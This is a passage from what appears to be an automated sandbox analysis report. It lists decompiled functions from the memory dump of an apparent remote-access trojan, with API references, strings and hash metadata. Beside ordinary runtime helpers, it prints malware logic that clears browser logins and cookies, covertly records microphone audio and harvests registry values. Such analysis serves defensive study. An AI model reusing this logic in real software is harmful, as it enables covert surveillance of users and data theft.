                      						_t33 = E0076F09C(_t56);
                      						_t57 = _v12;
                      						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33; // write the three entries back re-encoded, with the free-slot pointer advanced by one
                      						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E0076F09C(_t78 + 4);
                      						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E0076F09C(_t83);
                      						_t37 = 0;
                      						L15:
                      						return _t37; // 0 on success, -1 when the allocation failed
                      					}
                      					_t38 = 0x200;
                      					_t85 = _t83 - _t56 >> 2; // current slot count
                      					if(_t85 <= 0x200) {
                      						_t38 = _t85;
                      					}
                      					_t80 = _t38 + _t85; // grow by min(count, 512)
                      					if(_t80 == 0) {
                      						_t80 = 0x20; // empty table: first allocation is 32 slots
                      					}
                      					if(_t80 < _t85) { // the sum overflowed: fall back to count + 4
                      						L9:
                      						_push(4);
                      						_t80 = _t85 + 4;
                      						_push(_t80);
                      						_v8 = E00787D55(_t56); // reallocate the array to _t80 slots of 4 bytes (arguments: old block, count, element size)
                      						_t40 = E007801F5(0); // E007801F5 is the _free.LIBCMT referenced in the previous function's API list; _free(NULL) is a no-op
                      						_t68 = _v8;
                      						_t86 = _t86 + 0x10;
                      						if(_t68 != 0) {
                      							goto L11;
                      						}
                      						_t37 = _t40 | 0xffffffff;
                      						goto L15;
                      					} else {
                      						_push(4);
                      						_push(_t80);
                      						_v8 = E00787D55(_t56);
                      						E007801F5(0);
                      						_t68 = _v8;
                      						_t86 = _t86 + 0x10;
                      						if(_t68 != 0) {
                      							L11:
                      							_t56 = _t68;
                      							_v8 = _t68 + _t85 * 4;
                      							_t83 = _t68 + _t80 * 4;
                      							_t78 = _v8;
                      							_push(0x20);
                      							asm("ror eax, cl");
                      							_t71 = _t78;
                      							_v16 = 0 ^  *0x7aa00c;
                      							asm("sbb edx, edx");
                      							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                      							_v8 = _t74;
                      							if(_t74 == 0) {
                      								goto L14;
                      							}
                      							_t75 = _v16;
                      							_t50 = 0;
                      							do {
                      								_t50 = _t50 + 1;
                      								 *_t71 = _t75;
                      								_t71 = _t71 + 4;
                      							} while (_t50 != _v8);
                      							goto L14;
                      						}
                      						goto L9;
                      					}
                      				}
                      				return _t28 | 0xffffffff;
                      			}

                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Similarity
                      • API ID: _free
                      • String ID:
                      • API String ID: 269201875-0
                      • Opcode ID: 1a2cb0b3967efaec57723bcd1f7b318fe4e0529cc027e7093f8165b63ee9503a
                      • Instruction ID: 457bc4e064981b6969c50e0327a104e49a474ef0b177992f365f264e2313146a
                      • Opcode Fuzzy Hash: 1a2cb0b3967efaec57723bcd1f7b318fe4e0529cc027e7093f8165b63ee9503a
                      • Instruction Fuzzy Hash: B441D236E00204DFCB24DF78C885A5EB7B5EF89354B1585A9EA19EB251EB35AD01CB80
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 81%
                      			E007893AC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                      				signed int _v8;
                      				int _v12;
                      				char _v16;
                      				intOrPtr _v24;
                      				char _v28;
                      				void* _v40;
                      				signed int _t34;
                      				signed int _t40;
                      				int _t46;
                      				int _t53;
                      				void* _t55;
                      				int _t57;
                      				signed int _t63;
                      				int _t67;
                      				short* _t69;
                      				signed int _t70;
                      				short* _t71;
                      
                      				_t34 =  *0x7aa00c; // 0x67a7e35e
                      				_v8 = _t34 ^ _t70;
                      				E00775507(__ebx,  &_v28, __edx, _a4);
                      				_t57 = _a24;
                      				if(_t57 == 0) {
                      					_t53 =  *(_v24 + 8);
                      					_t57 = _t53;
                      					_a24 = _t53;
                      				}
                      				_t67 = 0;
                      				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                      				_v12 = _t40;
                      				if(_t40 == 0) {
                      					L15:
                      					if(_v16 != 0) {
                      						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                      					}
                      					return E0076FD1B(_v8 ^ _t70);
                      				}
                      				_t55 = _t40 + _t40;
                      				asm("sbb eax, eax");
                      				if((_t55 + 0x00000008 & _t40) == 0) {
                      					_t69 = 0;
                      					L11:
                      					if(_t69 != 0) {
                      						E00771F00(_t67, _t69, _t67, _t55);
                      						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                      						if(_t46 != 0) {
                      							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                      						}
                      					}
                      					L14:
                      					E00770BA0(_t69);
                      					goto L15;
                      				}
                      				asm("sbb eax, eax");
                      				_t48 = _t40 & _t55 + 0x00000008;
                      				_t63 = _t55 + 8;
                      				if((_t40 & _t55 + 0x00000008) > 0x400) {
                      					asm("sbb eax, eax");
                      					_t69 = E0077F98C(_t63, _t48 & _t63);
                      					if(_t69 == 0) {
                      						goto L14;
                      					}
                      					 *_t69 = 0xdddd;
                      					L9:
                      					_t69 =  &(_t69[4]);
                      					goto L11;
                      				}
                      				asm("sbb eax, eax");
                      				E00790810();
                      				_t69 = _t71;
                      				if(_t69 == 0) {
                      					goto L14;
                      				}
                      				 *_t69 = 0xcccc;
                      				goto L9;
                      			}

                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00768E1A,?,?,?,00000001,?,?,00000001,00768E1A,00768E1A), ref: 007893F9
                      • __alloca_probe_16.LIBCMT ref: 00789431
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00768E1A,?,?,?,00000001,?,?,00000001,00768E1A,00768E1A,?), ref: 00789482
                      • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,00768E1A,00768E1A,?,00000002,?), ref: 00789494
                      • __freea.LIBCMT ref: 0078949D
                        • Part of subcall function 0077F98C: HeapAlloc.KERNEL32(00000000,?,?,?,0076F244,?,?,00741696,?,?,?,?,?), ref: 0077F9BE
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Similarity
                      • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                      • String ID:
                      • API String ID: 1857427562-0
                      • Opcode ID: ae5fc3ed2cfb1e71c6a9169aa949f07bcbbf87df63d74ee183eb6cc91e86810b
                      • Instruction ID: 5b67ca9cba664c842b196f2b42b87eb98692b8b0164f9d24d081880c0876a050
                      • Opcode Fuzzy Hash: ae5fc3ed2cfb1e71c6a9169aa949f07bcbbf87df63d74ee183eb6cc91e86810b
                      • Instruction Fuzzy Hash: 6A31CE72A0024AABDF25AF64DC45EBF7BA5EB40310F088129FD08D7291E739DD52CB90
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E0074A523(void* __edi) {
                      				char _v5;
                      				char _v6;
                      				char _v7;
                      				void* __ebx;
                      				void* __ecx;
                      				void* __ebp;
                      				intOrPtr _t18;
                      				void* _t36;
                      				intOrPtr _t40;
                      				char _t50;
                      				void* _t52;
                      				signed int _t53;
                      				signed int _t54;
                      				void* _t55;
                      
                      				_t52 = __edi;
                      				_t54 = _t53 & 0xfffffff8;
                      				 *0x7abaf9 = 1;
                      				Sleep( *0x7abaf4);
                      				_v7 = 0;
                      				_t36 = 0;
                      				_v6 = 0;
                      				_v5 = 0;
                      				goto L1;
                      				do {
                      					do {
                      						L1:
                      						_t59 = _t36;
                      						if(_t36 == 0) {
                      							L2:
                      							_t36 = E0074A409(_t59);
                      						}
                      						_t60 = _t36;
                      						if(_t36 == 0) {
                      							_t36 = E0074A22D(_t52, _t60);
                      						}
                      						_t61 = _v6;
                      						if(_v6 == 0) {
                      							_v6 = E0074A012(_t36, _t52, _t61);
                      						}
                      						_t62 = _v7;
                      						if(_v7 == 0) {
                      							_v7 = E00749F83(_t52, _t62);
                      						}
                      						_t50 = _v5;
                      						_t63 = _t50;
                      						if(_t50 == 0) {
                      							_t50 = E00749EF4(_t52, _t63);
                      							_v5 = _t50;
                      						}
                      						if(_t36 == 0 || _t36 == 0) {
                      							L16:
                      							Sleep(0x1388);
                      							_t18 = _v7;
                      							_t40 = _v6;
                      							_t50 = _v5;
                      						} else {
                      							_t18 = _v7;
                      							if(_t18 == 0 || _t50 == 0) {
                      								goto L16;
                      							} else {
                      								_t40 = _v6;
                      								if(_t40 == 0) {
                      									goto L16;
                      								}
                      							}
                      						}
                      						if(_t36 == 0) {
                      							goto L2;
                      						}
                      					} while (_t36 == 0 || _t18 == 0 || _t50 == 0);
                      					_t73 = _t40;
                      				} while (_t40 == 0);
                      				_t55 = _t54 - 0x18;
                      				E00742084(_t36, _t55, "\n[Cleared browsers logins and cookies.]\n");
                      				E0074A6EF(_t36, _t50, _t73);
                      				E00742084(_t36, _t55, "Cleared browsers logins and cookies.");
                      				_t56 = _t55 - 0x18;
                      				E00742084(_t36, _t55 - 0x18, "[Info]");
                      				E00756C80(_t36, _t52);
                      				E00742084(_t36, _t56 + 0x18, 0x79f6bc);
                      				_push(0xaf);
                      				E00744AA4(_t36, 0x7ac780, _t50, _t73);
                      				if( *0x7abaf8 != 0) {
                      					E00750BB0(0x7ac518, E00741F95(0x7ac518), "FR", 1);
                      				}
                      				 *0x7abaf9 = 0;
                      				return 0;
                      			}

                      Strings
                      • [Info], xrefs: 0074A61B
                      • [Cleared browsers logins and cookies.], xrefs: 0074A5FB
                      • Cleared browsers logins and cookies., xrefs: 0074A60C
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Similarity
                      • API ID: Sleep
                      • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[Info]
                      • API String ID: 3472027048-899236412
                      • Opcode ID: 6e3f83653613e1c1480df3d406e30eaf9cd923a504749593aa433d704fb9e149
                      • Instruction ID: eb28510bee8cd2a7ce770eb1e0d33009ecb00270379efafc1936840f07e6d130
                      • Opcode Fuzzy Hash: 6e3f83653613e1c1480df3d406e30eaf9cd923a504749593aa433d704fb9e149
                      • Instruction Fuzzy Hash: 3931D50128C381BECB1167B8251A7EABF920FA3750F498459F8D44B393DB9E482D9363
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E00741BCD(void* __eflags) {
                      				signed short _t3;
                      				signed int _t7;
                      				signed int _t15;
                      				signed int _t24;
                      				signed int _t25;
                      				intOrPtr* _t33;
                      				void* _t34;
                      
                      				_t34 = __eflags;
                      				CreateDirectoryW(E00741EEB(0x7ac0e0), 0);
                      				_t3 = 8;
                      				 *0x7abaa6 = _t3;
                      				 *0x7aba9c = 0x1f40;
                      				 *0x7abaa0 = 0x1f40;
                      				0x7aba98->wFormatTag = 1;
                      				 *0x7aba9a = 1;
                      				 *0x7abaa4 = 1;
                      				 *0x7abaa8 = 0;
                      				_t7 = E00776769(_t5, E00741F95(E00741E49(0x7ac578, 1, _t34, 0x24)));
                      				_t24 =  *0x7aba9c; // 0x0
                      				 *_t33 = 0x30008;
                      				_t25 = _t24 * _t7 * 0x3c;
                      				 *0x7abaac = _t25;
                      				 *0x7abab4 = (( *0x7abaa6 & 0x0000ffff) >> 3) * _t25;
                      				waveInOpen(0x7abab0, 0xffffffff, 0x7aba98, E00741CEF, 0, ??);
                      				E00741F84( *0x7abab4);
                      				0x7aba78->lpData = E00741F95(0x7ac0f8);
                      				_t15 =  *0x7abab4; // 0x0
                      				 *0x7aba7c = _t15;
                      				 *0x7aba80 = 0;
                      				 *0x7aba84 = 0;
                      				 *0x7aba88 = 0;
                      				 *0x7aba8c = 0;
                      				waveInPrepareHeader( *0x7abab0, 0x7aba78, 0x20);
                      				waveInAddBuffer( *0x7abab0, 0x7aba78, 0x20);
                      				waveInStart( *0x7abab0);
                      				return 0;
                      			}

                      APIs
                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00741BDD
                      • waveInOpen.WINMM(007ABAB0,000000FF,007ABA98,Function_00001CEF,00000000,00000000,00000024), ref: 00741C73
                      • waveInPrepareHeader.WINMM(007ABA78,00000020), ref: 00741CC7
                      • waveInAddBuffer.WINMM(007ABA78,00000020), ref: 00741CD6
                      • waveInStart.WINMM ref: 00741CE2
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Similarity
                      • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                      • String ID:
                      • API String ID: 1356121797-0
                      • Opcode ID: 8aa343251d2cba84caf522ec9bd59d05114db0483b826cacf320ce2b976c7abc
                      • Instruction ID: 2eaff7b156aa8343d43591ca3349182cdb2d6d3c5ca9a27c6b7c29ab184335c6
                      • Opcode Fuzzy Hash: 8aa343251d2cba84caf522ec9bd59d05114db0483b826cacf320ce2b976c7abc
                      • Instruction Fuzzy Hash: BD214A71A54200EBC714AF76AC0A92A7AA5EBC7311B40C12EF109D7AB2EB3C48419B5C
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E007875DA() {
                      				int _v8;
                      				void* __ecx;
                      				void* _t6;
                      				int _t7;
                      				char* _t13;
                      				int _t17;
                      				void* _t19;
                      				char* _t25;
                      				WCHAR* _t27;
                      
                      				_t27 = GetEnvironmentStringsW();
                      				if(_t27 == 0) {
                      					L7:
                      					_t13 = 0;
                      				} else {
                      					_t6 = E007875A3(_t27);
                      					_pop(_t19);
                      					_t17 = _t6 - _t27 >> 1;
                      					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
                      					_v8 = _t7;
                      					if(_t7 == 0) {
                      						goto L7;
                      					} else {
                      						_t25 = E0077F98C(_t19, _t7);
                      						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
                      							_t13 = 0;
                      						} else {
                      							_t13 = _t25;
                      							_t25 = 0;
                      						}
                      						E007801F5(_t25);
                      					}
                      				}
                      				if(_t27 != 0) {
                      					FreeEnvironmentStringsW(_t27);
                      				}
                      				return _t13;
                      			}

                      APIs
                      • GetEnvironmentStringsW.KERNEL32 ref: 007875E3
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00787606
                        • Part of subcall function 0077F98C: HeapAlloc.KERNEL32(00000000,?,?,?,0076F244,?,?,00741696,?,?,?,?,?), ref: 0077F9BE
                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0078762C
                      • _free.LIBCMT ref: 0078763F
                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0078764E
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Similarity
                      • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                      • String ID:
                      • API String ID: 2278895681-0
                      • Opcode ID: cdf278c4333aadd078ce64be8a522be67adf1e6bb7142139278ad38d207e3ed0
                      • Instruction ID: 6864e5fc4520dcdc9b1535ae1ad90ee6f6e0b85e2af0dc87fced88251d1af807
                      • Opcode Fuzzy Hash: cdf278c4333aadd078ce64be8a522be67adf1e6bb7142139278ad38d207e3ed0
                      • Instruction Fuzzy Hash: 1601D4B2745A15BF272526AA5C8CC7B6A6DDEC2BA0324012AF905C3250EE69CD02C3B4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 82%
                      			E00781D66(void* __ecx) {
                      				void* __esi;
                      				intOrPtr _t2;
                      				void* _t4;
                      				void* _t10;
                      				void* _t11;
                      				void* _t13;
                      				void* _t15;
                      				long _t16;
                      
                      				_t11 = __ecx;
                      				_t16 = GetLastError();
                      				_t10 = 0;
                      				_t2 =  *0x7aa1e0; // 0x6
                      				_t19 = _t2 - 0xffffffff;
                      				if(_t2 == 0xffffffff) {
                      					L2:
                      					_t15 = E0077F348(_t11, 1, 0x364);
                      					_pop(_t13);
                      					if(_t15 != 0) {
                      						_t4 = E007822DF(_t13, _t16, __eflags,  *0x7aa1e0, _t15);
                      						__eflags = _t4;
                      						if(_t4 != 0) {
                      							E00781B54(_t13, _t15, 0x7ab654);
                      							E007801F5(_t10);
                      							__eflags = _t15;
                      							if(_t15 != 0) {
                      								goto L9;
                      							} else {
                      								goto L8;
                      							}
                      						} else {
                      							_push(_t15);
                      							goto L4;
                      						}
                      					} else {
                      						_push(_t10);
                      						L4:
                      						E007801F5();
                      						L8:
                      						SetLastError(_t16);
                      					}
                      				} else {
                      					_t15 = E00782289(_t11, _t16, _t19, _t2);
                      					if(_t15 != 0) {
                      						L9:
                      						SetLastError(_t16);
                      						_t10 = _t15;
                      					} else {
                      						goto L2;
                      					}
                      				}
                      				return _t10;
                      			}

                      APIs
                      • GetLastError.KERNEL32(?,?,?,0077A509,0077F9CF,?,?,0076F244,?,?,00741696,?,?,?,?,?), ref: 00781D6B
                      • _free.LIBCMT ref: 00781DA0
                      • _free.LIBCMT ref: 00781DC7
                      • SetLastError.KERNEL32(00000000), ref: 00781DD4
                      • SetLastError.KERNEL32(00000000), ref: 00781DDD
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: ErrorLast$_free
                      • String ID:
                      • API String ID: 3170660625-0
                      • Opcode ID: e3fd760a31bf640e72b971abefff5a789b8c0f2e58ecde76b7a096086a9586e0
                      • Instruction ID: a4b0725efe5b808ee9cd06808ab731f2b280ede230feff12f4f0148227241db1
                      • Opcode Fuzzy Hash: e3fd760a31bf640e72b971abefff5a789b8c0f2e58ecde76b7a096086a9586e0
                      • Instruction Fuzzy Hash: ED01D1763C0601BB92127365AC4DE2B163DABD23B27614129F90592292EF2C89074374
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00788C3C(intOrPtr* _a4) {
                      				intOrPtr _t6;
                      				intOrPtr* _t21;
                      				void* _t23;
                      				void* _t24;
                      				void* _t25;
                      				void* _t26;
                      				void* _t27;
                      
                      				_t21 = _a4;
                      				if(_t21 != 0) {
                      					_t23 =  *_t21 -  *0x7aa188; // 0x7aa180
                      					if(_t23 != 0) {
                      						E007801F5(_t7);
                      					}
                      					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x7aa18c; // 0x7ab64c
                      					if(_t24 != 0) {
                      						E007801F5(_t8);
                      					}
                      					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x7aa190; // 0x7ab64c
                      					if(_t25 != 0) {
                      						E007801F5(_t9);
                      					}
                      					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x7aa1b8; // 0x7aa184
                      					if(_t26 != 0) {
                      						E007801F5(_t10);
                      					}
                      					_t6 =  *((intOrPtr*)(_t21 + 0x34));
                      					_t27 = _t6 -  *0x7aa1bc; // 0x7ab650
                      					if(_t27 != 0) {
                      						return E007801F5(_t6);
                      					}
                      				}
                      				return _t6;
                      			}

                      APIs
                      • _free.LIBCMT ref: 00788C54
                        • Part of subcall function 007801F5: HeapFree.KERNEL32(00000000,00000000,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?), ref: 0078020B
                        • Part of subcall function 007801F5: GetLastError.KERNEL32(?,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?,?), ref: 0078021D
                      • _free.LIBCMT ref: 00788C66
                      • _free.LIBCMT ref: 00788C78
                      • _free.LIBCMT ref: 00788C8A
                      • _free.LIBCMT ref: 00788C9C
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 7241904ee91c7e3f9d678c888c2d063bb9645e069dbc68e91d207cb62b58f406
                      • Instruction ID: b36fed1f1eaef44ce8f12c5bc2b0f4b09cdd76135660418723d838e9e261e818
                      • Opcode Fuzzy Hash: 7241904ee91c7e3f9d678c888c2d063bb9645e069dbc68e91d207cb62b58f406
                      • Instruction Fuzzy Hash: 32F06232885208FF86A0FB69E989C1A73F9BB857207944849F248D7500CF3CFC8187B6
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E0077D8BC(signed int __ecx) {
                      				intOrPtr _t7;
                      
                      				asm("lock xadd [eax], ecx");
                      				if((__ecx | 0xffffffff) == 0) {
                      					_t7 =  *0x7aa9a0; // 0x2d27d98
                      					if(_t7 != 0x7aa780) {
                      						E007801F5(_t7);
                      						 *0x7aa9a0 = 0x7aa780;
                      					}
                      				}
                      				E007801F5( *0x7aba08);
                      				 *0x7aba08 = 0;
                      				E007801F5( *0x7aba0c);
                      				 *0x7aba0c = 0;
                      				E007801F5( *0x7aba34);
                      				 *0x7aba34 = 0;
                      				E007801F5( *0x7aba38);
                      				 *0x7aba38 = 0;
                      				return 1;
                      			}

                      APIs
                      • _free.LIBCMT ref: 0077D8DA
                        • Part of subcall function 007801F5: HeapFree.KERNEL32(00000000,00000000,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?), ref: 0078020B
                        • Part of subcall function 007801F5: GetLastError.KERNEL32(?,?,00788EEF,?,00000000,?,00000000,?,00789193,?,00000007,?,?,007896DE,?,?), ref: 0078021D
                      • _free.LIBCMT ref: 0077D8EC
                      • _free.LIBCMT ref: 0077D8FF
                      • _free.LIBCMT ref: 0077D910
                      • _free.LIBCMT ref: 0077D921
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: _free$ErrorFreeHeapLast
                      • String ID:
                      • API String ID: 776569668-0
                      • Opcode ID: 56ab4ca8ed21794450f469e12770de5052cf23fb78a9d6a66e8e441c8b7b7ed6
                      • Instruction ID: c453117bf0df7e38852dbff483b60eda08617d603ce23ca32e01b0387d8da786
                      • Opcode Fuzzy Hash: 56ab4ca8ed21794450f469e12770de5052cf23fb78a9d6a66e8e441c8b7b7ed6
                      • Instruction Fuzzy Hash: 12F0DA75C82124DFCB957F24AC4A4093B60AB8A760701C116F61456672DF3D1846DFCA
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 88%
                      			E00750D8E(void* __ecx) {
                      				int _v8;
                      				int _v12;
                      				int _v16;
                      				int _v20;
                      				int _v24;
                      				int _v28;
                      				int _v32;
                      				char _v56;
                      				int _v60;
                      				int _v64;
                      				int _v68;
                      				int _v72;
                      				int _v76;
                      				struct _FILETIME _v84;
                      				char _v95;
                      				char _v96;
                      				char _v108;
                      				char _v132;
                      				char _v156;
                      				short _v668;
                      				short _v1188;
                      				char _v11188;
                      				short _v43956;
                      				void* __ebx;
                      				void* __edi;
                      				int _t72;
                      				long _t73;
                      				void* _t93;
                      				long _t103;
                      				void* _t110;
                      				void* _t141;
                      				int _t145;
                      				int _t147;
                      				void* _t148;
                      				void* _t149;
                      
                      				_t112 = __ecx;
                      				E00790D30();
                      				_push(_t141);
                      				_t145 = 0;
                      				_t110 = __ecx;
                      				E00771F00(_t141,  &_v1188, 0, 0x208);
                      				_t149 = _t148 + 0xc;
                      				_v24 = 0x104;
                      				_v8 = 0;
                      				_v12 = 0x3fff;
                      				RegQueryInfoKeyW(_t110,  &_v1188,  &_v24, 0,  &_v8,  &_v76,  &_v72,  &_v20,  &_v68,  &_v64,  &_v60,  &_v84);
                      				_t72 = _v8;
                      				if(_t72 != 0 && _t72 != 0) {
                      					do {
                      						_v28 = 0xff;
                      						_t103 = RegEnumKeyExW(_t110, _t145,  &_v668,  &_v28, 0, 0, 0,  &_v84);
                      						_t152 = _t103;
                      						if(_t103 == 0) {
                      							E00743311(E00744405(_t110,  &_v108,  &_v668, _t152, E0074427F(_t110,  &_v56, "\n")));
                      							E00741EF0();
                      							_t112 =  &_v56;
                      							E00741EF0();
                      						}
                      						_t145 = _t145 + 1;
                      					} while (_t145 < _v8);
                      				}
                      				_t73 = _v20;
                      				if(_t73 != 0) {
                      					_t147 = 0;
                      					if(_t73 != 0) {
                      						do {
                      							_v96 = 0;
                      							_v16 = 0x2710;
                      							asm("stosd");
                      							_v12 = 0x3fff;
                      							asm("stosd");
                      							asm("stosw");
                      							asm("stosb");
                      							_v43956 = 0;
                      							_t73 = RegEnumValueW(_t110, _t147,  &_v43956,  &_v12, 0,  &_v32,  &_v11188,  &_v16);
                      							_t156 = _t73;
                      							if(_t73 == 0) {
                      								E0077BACE(_t112, _v32,  &_v96, 0xa);
                      								_t149 = _t149 + 0xc;
                      								E00743311(E00744405(_t110,  &_v56,  &_v43956, _t156, E0074427F(_t110,  &_v132, "\n")));
                      								E00741EF0();
                      								E00741EF0();
                      								E00743436(E007475C2(_t110,  &_v132,  &_v96,  &_v95, _t156, E00742084(_t110,  &_v56, "\n")));
                      								E00741FC7();
                      								E00741FC7();
                      								_t93 = E00742084(_t110,  &_v156, "[regsplt]");
                      								E00743436(E00742F1D( &_v132, E007420AB(_t110,  &_v56,  &_v96, _t156,  &_v11188, _v16), _t93));
                      								E00741FC7();
                      								E00741FC7();
                      								_t112 =  &_v156;
                      								_t73 = E00741FC7();
                      							}
                      							_t147 = _t147 + 1;
                      						} while (_t147 < _v20);
                      					}
                      				}
                      				return _t73;
                      			}

                      APIs
                      • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00750DF5
                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00750E24
                      • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00750EC4
                      Strings
                      Memory Dump Source
                      • Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true
                      • Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp
                      Yara matches
                      Similarity
                      • API ID: Enum$InfoQueryValue
                      • String ID: [regsplt]
                      • API String ID: 3554306468-4262303796
                      • Opcode ID: a570975cae0318b595ed581f70c82e4d1c1024e2e790d71c0dd536493730b493
                      • Instruction ID: 5008fe88316a85d65fe23517a23bb6fcf618d2f4f7fcd52bc0b2281d99e22355
                      • Opcode Fuzzy Hash: a570975cae0318b595ed581f70c82e4d1c1024e2e790d71c0dd536493730b493
                      • Instruction Fuzzy Hash: 60511871900119EADB15EBA4DC8AEEEB7BDBF45300F500166F905E2091EF786B49CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 72%
                      			E00786969(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, intOrPtr _a12) {
                      				intOrPtr _v0;
                      				char _v6;
                      				char _v8;
                      				signed int _v12;
                      				signed int _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				signed int _v28;
                      				signed int _v36;
                      				intOrPtr* _v64;
                      				intOrPtr _v96;
                      				intOrPtr* _v100;
                      				CHAR* _v104;
                      				signed int _v116;
                      				char _v290;
                      				signed int _v291;
                      				struct _WIN32_FIND_DATAA _v336;
                      				union _FINDEX_INFO_LEVELS _v340;
                      				signed int _v344;
                      				signed int _v348;
                      				intOrPtr _v440;
                      				intOrPtr* _t80;
                      				signed int _t82;
                      				signed int _t87;
                      				signed int _t91;
                      				signed int _t93;
                      				signed int _t95;
                      				signed int _t96;
                      				signed int _t100;
                      				signed int _t103;
                      				signed int _t108;
                      				signed int _t111;
                      				intOrPtr _t113;
                      				signed char _t115;
                      				union _FINDEX_INFO_LEVELS _t123;
                      				signed int _t128;
                      				signed int _t131;
                      				void* _t137;
                      				void* _t139;
                      				signed int _t140;
                      				signed int _t143;
                      				signed int _t145;
                      				signed int _t147;
                      				signed int* _t148;
                      				signed int _t151;
                      				void* _t154;
                      				CHAR* _t155;
                      				char _t158;
                      				char _t160;
                      				intOrPtr* _t163;
                      				void* _t164;
                      				intOrPtr* _t165;
                      				signed int _t167;
                      				void* _t169;
                      				intOrPtr* _t170;
                      				signed int _t174;
                      				signed int _t178;
                      				signed int _t179;
                      				intOrPtr* _t184;
                      				void* _t193;
                      				intOrPtr _t194;
                      				signed int _t196;
                      				signed int _t197;
                      				signed int _t199;
                      				signed int _t200;
                      				signed int _t202;
                      				union _FINDEX_INFO_LEVELS _t203;
                      				signed int _t208;
                      				signed int _t210;
                      				signed int _t211;
                      				void* _t213;
                      				intOrPtr _t214;
                      				void* _t215;
                      				signed int _t219;
